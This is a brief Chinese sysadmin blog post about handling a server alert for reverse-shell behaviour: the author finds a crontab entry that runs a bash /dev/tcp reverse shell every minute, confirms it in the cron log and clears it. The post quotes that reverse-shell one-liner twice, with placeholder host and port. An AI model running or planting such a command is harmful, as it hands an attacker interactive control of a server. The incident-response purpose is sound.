linux服务器告警反弹shell行为

客户今天持续收到服务器告警,给出了可以参数信息

检测说明:进程sh的启动参数为 /bin/sh -c bash -i>& /dev/tcp/服务器iP/端口 0>&1,符合可疑进程参数的特性.

告警说明:Linux反弹shell行为

crontab -l

发现有记录  * * * * * bash -i >& /dev/tcp/服务器iP/端口 0>&1

cat /var/log/cron | grep /dev/tcp/服务器iP/端口 

再去看cron日志,果然一分钟一次

crontab -e

果断将里面的内容清空,到此告警消失

你可能感兴趣的:(运维,linux,服务器,运维)